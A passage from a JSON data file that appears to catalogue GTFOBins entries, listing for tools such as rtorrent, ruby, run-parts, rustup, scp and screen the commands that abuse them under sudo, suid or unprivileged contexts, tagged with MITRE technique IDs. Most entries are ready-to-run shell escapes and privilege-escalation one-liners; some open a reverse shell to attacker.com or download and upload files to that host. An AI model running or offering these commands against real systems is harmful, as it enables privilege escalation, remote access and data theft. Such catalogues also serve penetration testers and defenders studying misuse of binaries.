Escalation"],"nativeCategory":["shell"],"command":"echo 'execute = /bin/sh,-p,-c,\"/bin/sh -p </dev/tty >/dev/tty 2>/dev/tty\"' >~/.rtorrent.rc\nrtorrent","description":"After the shell, exit with `Ctrl-Q`.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rtorrent/"]},{"id":"gtfo:rtorrent:shell:0:unprivileged","toolId":"gtfo:rtorrent","toolName":"rtorrent","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'execute = /bin/sh,-c,\"/bin/sh </dev/tty >/dev/tty 2>/dev/tty\"' >~/.rtorrent.rc\nrtorrent","description":"After the shell, exit with `Ctrl-Q`.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rtorrent/"]},{"id":"gtfo:ruby:download:0:sudo","toolId":"gtfo:ruby","toolName":"ruby","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ruby -e 'require \"open-uri\"; download = URI.open(\"http://attacker.com/path/to/input-file\"); IO.copy_stream(download, \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:ruby:download:0:unprivileged","toolId":"gtfo:ruby","toolName":"ruby","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"ruby -e 'require \"open-uri\"; download = URI.open(\"http://attacker.com/path/to/input-file\"); IO.copy_stream(download, \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:ruby:file-read:0:sudo","toolId":"gtfo:ruby","toolName":"ruby","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ruby -e 'puts File.read(\"/path/to/input-file\")'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:ruby:file-read:0:unprivileged","toolId":"gtfo:ruby","toolName":"ruby","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ruby -e 'puts File.read(\"/path/to/input-file\")'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:ruby:file-write:0:sudo","toolId":"gtfo:ruby","toolName":"ruby","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ruby -e 'File.open(\"/path/to/output-file\", \"w+\") { |f| f.write(\"DATA\") }'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:ruby:file-write:0:unprivileged","toolId":"gtfo:ruby","toolName":"ruby","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"ruby -e 'File.open(\"/path/to/output-file\", \"w+\") { |f| f.write(\"DATA\") }'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:ruby:library-load:0:sudo","toolId":"gtfo:ruby","toolName":"ruby","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"ruby -e 'require \"fiddle\"; Fiddle.dlopen(\"/path/to/lib.so\")'","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:ruby:library-load:0:unprivileged","toolId":"gtfo:ruby","toolName":"ruby","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"ruby -e 'require \"fiddle\"; Fiddle.dlopen(\"/path/to/lib.so\")'","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:ruby:reverse-shell:0:sudo","toolId":"gtfo:ruby","toolName":"ruby","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"attacker.com\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:ruby:reverse-shell:0:unprivileged","toolId":"gtfo:ruby","toolName":"ruby","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"attacker.com\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:ruby:shell:0:capabilities","toolId":"gtfo:ruby","toolName":"ruby","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ruby -e 'Process::Sys.setuid(0); exec \"/bin/sh\"'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:ruby:shell:0:sudo","toolId":"gtfo:ruby","toolName":"ruby","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ruby -e 'exec \"/bin/sh\"'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:ruby:shell:0:unprivileged","toolId":"gtfo:ruby","toolName":"ruby","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ruby -e 'exec \"/bin/sh\"'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:ruby:upload:0:sudo","toolId":"gtfo:ruby","toolName":"ruby","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"ruby -run -e httpd . -p 80","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:ruby:upload:0:unprivileged","toolId":"gtfo:ruby","toolName":"ruby","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"ruby -run -e httpd . -p 80","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:run-mailcap:inherit:0:sudo","toolId":"gtfo:run-mailcap","toolName":"run-mailcap","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"run-mailcap --action=view text/plain:/etc/hosts","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/run-mailcap/"]},{"id":"gtfo:run-mailcap:inherit:0:unprivileged","toolId":"gtfo:run-mailcap","toolName":"run-mailcap","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"run-mailcap --action=view text/plain:/etc/hosts","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/run-mailcap/"]},{"id":"gtfo:run-mailcap:inherit:1:sudo","toolId":"gtfo:run-mailcap","toolName":"run-mailcap","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"run-mailcap --action=edit text/plain:/path/to/output-file","description":"The file must exist and be not empty.","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/run-mailcap/"]},{"id":"gtfo:run-mailcap:inherit:1:unprivileged","toolId":"gtfo:run-mailcap","toolName":"run-mailcap","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:vi"],"command":"run-mailcap --action=edit text/plain:/path/to/output-file","description":"The file must exist and be not empty.","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/run-mailcap/"]},{"id":"gtfo:run-parts:shell:0:sudo","toolId":"gtfo:run-parts","toolName":"run-parts","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"run-parts --new-session --regex '^sh$' /bin","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/run-parts/"]},{"id":"gtfo:run-parts:shell:0:suid","toolId":"gtfo:run-parts","toolName":"run-parts","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"run-parts --new-session --regex '^sh$' /bin --arg='-p'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/run-parts/"]},{"id":"gtfo:run-parts:shell:0:unprivileged","toolId":"gtfo:run-parts","toolName":"run-parts","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"run-parts --new-session --regex '^sh$' /bin","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/run-parts/"]},{"id":"gtfo:run-parts:shell:1:sudo","toolId":"gtfo:run-parts","toolName":"run-parts","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cp /bin/sh /path/to/temp-dir/\nrun-parts /path/to/temp-dir/","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/run-parts/"]},{"id":"gtfo:run-parts:shell:1:suid","toolId":"gtfo:run-parts","toolName":"run-parts","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cp /bin/sh /path/to/temp-dir/\nrun-parts /path/to/temp-dir/ --arg='-p'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/run-parts/"]},{"id":"gtfo:run-parts:shell:1:unprivileged","toolId":"gtfo:run-parts","toolName":"run-parts","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cp /bin/sh /path/to/temp-dir/\nrun-parts /path/to/temp-dir/","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/run-parts/"]},{"id":"gtfo:runscript:shell:0:sudo","toolId":"gtfo:runscript","toolName":"runscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '! exec /bin/sh' >/path/to/temp-file\nrunscript /path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/runscript/"]},{"id":"gtfo:runscript:shell:0:suid","toolId":"gtfo:runscript","toolName":"runscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '! exec /bin/sh' >/path/to/temp-file\nrunscript /path/to/temp-file","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/runscript/"]},{"id":"gtfo:runscript:shell:0:unprivileged","toolId":"gtfo:runscript","toolName":"runscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '! exec /bin/sh' >/path/to/temp-file\nrunscript /path/to/temp-file","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/runscript/"]},{"id":"gtfo:rustc:file-read:0:sudo","toolId":"gtfo:rustc","toolName":"rustc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"rustc /path/to/input-file","description":"The compiler leaks some file lines in the compiler error.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustc/"]},{"id":"gtfo:rustc:file-read:0:unprivileged","toolId":"gtfo:rustc","toolName":"rustc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"rustc /path/to/input-file","description":"The compiler leaks some file lines in the compiler error.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustc/"]},{"id":"gtfo:rustc:file-write:0:sudo","toolId":"gtfo:rustc","toolName":"rustc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo 'fn main() { println!(\"DATA\"); }' >/path/to/temp-file\nrustc /path/to/temp-file -o /path/to/output-file","description":"The comment appears in the compiled program.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustc/"]},{"id":"gtfo:rustc:file-write:0:unprivileged","toolId":"gtfo:rustc","toolName":"rustc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo 'fn main() { println!(\"DATA\"); }' >/path/to/temp-file\nrustc /path/to/temp-file -o /path/to/output-file","description":"The comment appears in the compiled program.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustc/"]},{"id":"gtfo:rustc:inherit:0:sudo","toolId":"gtfo:rustc","toolName":"rustc","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"rustc --explain E0001","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustc/"]},{"id":"gtfo:rustc:inherit:0:unprivileged","toolId":"gtfo:rustc","toolName":"rustc","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"rustc --explain E0001","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustc/"]},{"id":"gtfo:rustdoc:file-read:0:sudo","toolId":"gtfo:rustdoc","toolName":"rustdoc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"rustdoc /path/to/input-file","description":"Partial content is displayed as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustdoc/"]},{"id":"gtfo:rustdoc:file-read:0:unprivileged","toolId":"gtfo:rustdoc","toolName":"rustdoc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"rustdoc /path/to/input-file","description":"Partial content is displayed as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustdoc/"]},{"id":"gtfo:rustdoc:file-write:0:sudo","toolId":"gtfo:rustdoc","toolName":"rustdoc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo '//! DATA' >/path/to/temp-file\nrustdoc /path/to/temp-file -o /path/to/output-dir/","description":"This command creates a number of documentation files in the target directory, and the data is written in multiple locations, e.g., `src/temp_file/temp-file.html`, amidst other content.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustdoc/"]},{"id":"gtfo:rustdoc:file-write:0:unprivileged","toolId":"gtfo:rustdoc","toolName":"rustdoc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo '//! DATA' >/path/to/temp-file\nrustdoc /path/to/temp-file -o /path/to/output-dir/","description":"This command creates a number of documentation files in the target directory, and the data is written in multiple locations, e.g., `src/temp_file/temp-file.html`, amidst other content.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustdoc/"]},{"id":"gtfo:rustfmt:file-read:0:sudo","toolId":"gtfo:rustfmt","toolName":"rustfmt","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"rustfmt /path/to/input-file","description":"Partial content is displayed as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustfmt/"]},{"id":"gtfo:rustfmt:file-read:0:unprivileged","toolId":"gtfo:rustfmt","toolName":"rustfmt","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"rustfmt /path/to/input-file","description":"Partial content is displayed as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustfmt/"]},{"id":"gtfo:rustup:command:0:sudo","toolId":"gtfo:rustup","toolName":"rustup","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"mkdir /path/to/temp-dir/bin/\nmkdir /path/to/temp-dir/lib/\necho '/path/to/command' >/path/to/temp-dir/bin/rustc\nchmod +x /path/to/temp-dir/bin/rustc\nrustup toolchain link x /path/to/temp-dir/\nrustup run x rustc","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustup/"]},{"id":"gtfo:rustup:command:0:unprivileged","toolId":"gtfo:rustup","toolName":"rustup","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"mkdir /path/to/temp-dir/bin/\nmkdir /path/to/temp-dir/lib/\necho '/path/to/command' >/path/to/temp-dir/bin/rustc\nchmod +x /path/to/temp-dir/bin/rustc\nrustup toolchain link x /path/to/temp-dir/\nrustup run x rustc","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustup/"]},{"id":"gtfo:rustup:shell:0:sudo","toolId":"gtfo:rustup","toolName":"rustup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mkdir /path/to/temp-dir/bin/\nmkdir /path/to/temp-dir/lib/\ncp /bin/sh /path/to/temp-dir/bin/rustc\nrustup toolchain link x /path/to/temp-dir/\nrustup run x rustc","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustup/"]},{"id":"gtfo:rustup:shell:0:unprivileged","toolId":"gtfo:rustup","toolName":"rustup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"mkdir /path/to/temp-dir/bin/\nmkdir /path/to/temp-dir/lib/\ncp /bin/sh /path/to/temp-dir/bin/rustc\nrustup toolchain link x /path/to/temp-dir/\nrustup run x rustc","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustup/"]},{"id":"gtfo:sash:shell:0:sudo","toolId":"gtfo:sash","toolName":"sash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sash","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sash/"]},{"id":"gtfo:sash:shell:0:suid","toolId":"gtfo:sash","toolName":"sash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sash","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sash/"]},{"id":"gtfo:sash:shell:0:unprivileged","toolId":"gtfo:sash","toolName":"sash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"sash","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sash/"]},{"id":"gtfo:scanmem:shell:0:sudo","toolId":"gtfo:scanmem","toolName":"scanmem","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"scanmem\nshell /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/scanmem/"]},{"id":"gtfo:scanmem:shell:0:suid","toolId":"gtfo:scanmem","toolName":"scanmem","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"scanmem\nshell /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/scanmem/"]},{"id":"gtfo:scanmem:shell:0:unprivileged","toolId":"gtfo:scanmem","toolName":"scanmem","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"scanmem\nshell /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/scanmem/"]},{"id":"gtfo:scp:download:0:sudo","toolId":"gtfo:scp","toolName":"scp","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"scp user@attacker.com:/path/to/input-file /path/to/output-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/scp/"]},{"id":"gtfo:scp:download:0:suid","toolId":"gtfo:scp","toolName":"scp","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"scp user@attacker.com:/path/to/input-file /path/to/output-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/scp/"]},{"id":"gtfo:scp:download:0:unprivileged","toolId":"gtfo:scp","toolName":"scp","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"scp user@attacker.com:/path/to/input-file /path/to/output-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/scp/"]},{"id":"gtfo:scp:shell:0:sudo","toolId":"gtfo:scp","toolName":"scp","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file\nchmod +x /path/to/temp-file\nscp -S /path/to/temp-file x x:","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/scp/"]},{"id":"gtfo:scp:shell:0:suid","toolId":"gtfo:scp","toolName":"scp","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file\nchmod +x /path/to/temp-file\nscp -S /path/to/temp-file x x:","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/scp/"]},{"id":"gtfo:scp:shell:0:unprivileged","toolId":"gtfo:scp","toolName":"scp","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file\nchmod +x /path/to/temp-file\nscp -S /path/to/temp-file x x:","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/scp/"]},{"id":"gtfo:scp:shell:1:sudo","toolId":"gtfo:scp","toolName":"scp","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"scp -o 'ProxyCommand=;/bin/sh 0<&2 1>&2' x x:","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/scp/"]},{"id":"gtfo:scp:shell:1:suid","toolId":"gtfo:scp","toolName":"scp","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"scp -o 'ProxyCommand=;/bin/sh 0<&2 1>&2' x x:","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/scp/"]},{"id":"gtfo:scp:shell:1:unprivileged","toolId":"gtfo:scp","toolName":"scp","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"scp -o 'ProxyCommand=;/bin/sh 0<&2 1>&2' x x:","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/scp/"]},{"id":"gtfo:scp:upload:0:sudo","toolId":"gtfo:scp","toolName":"scp","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"scp /path/to/input-file user@attacker.com:/path/to/output-file","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/scp/"]},{"id":"gtfo:scp:upload:0:suid","toolId":"gtfo:scp","toolName":"scp","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"scp /path/to/input-file user@attacker.com:/path/to/output-file","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/scp/"]},{"id":"gtfo:scp:upload:0:unprivileged","toolId":"gtfo:scp","toolName":"scp","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"scp /path/to/input-file user@attacker.com:/path/to/output-file","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/scp/"]},{"id":"gtfo:screen:file-write:0:sudo","toolId":"gtfo:screen","toolName":"screen","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"screen -L -Logfile /path/to/output-file echo DATA","description":"Data is appended to the file and `\\n` is converted to `\\r\\n`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/screen/"]},{"id":"gtfo:screen:file-write:0:unprivileged","toolId":"gtfo:screen","toolName":"screen","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"screen -L -Logfile /path/to/output-file echo DATA","description":"Data is appended to the file and `\\n` is converted to `\\r\\n`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/screen/"]},{"id":"gtfo:screen:file-write:1:sudo","toolId":"gtfo:screen","toolName":"screen","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"screen -L /path/to/output-file echo DATA","description":"Data is appended to the file and `\\n` is converted to `\\r\\n`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/screen/"]},{"id":"gtfo:screen:file-write:1:unprivileged","toolId":"gtfo:screen","toolName":"screen","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"screen -L /path/to/output-file echo DATA","description":"Data is appended to the file and `\\n` is converted to `\\r\\n`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/screen/"]},{"id":"gtfo:screen:shell:0:sudo","toolId":"gtfo:screen","toolName":"screen","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"screen","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/screen/"]},{"id":"gtfo:screen:shell:0:unprivileged","toolId":"gtfo:screen","toolName":"screen","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"screen","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/screen/"]},{"id":"gtfo:script:file-write:0:sudo","toolId":"gtfo:script","toolName":"script","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"script -q -c '# DATA' /path/to/output-file","description":"The content appears among the log prints.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/script/"]},{"id":"gtfo:script:file-write:0:suid","toolId":"gtfo:script","toolName":"script","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"script -q -c '# DATA' /path/to/output-file","description":"The content appears among the log 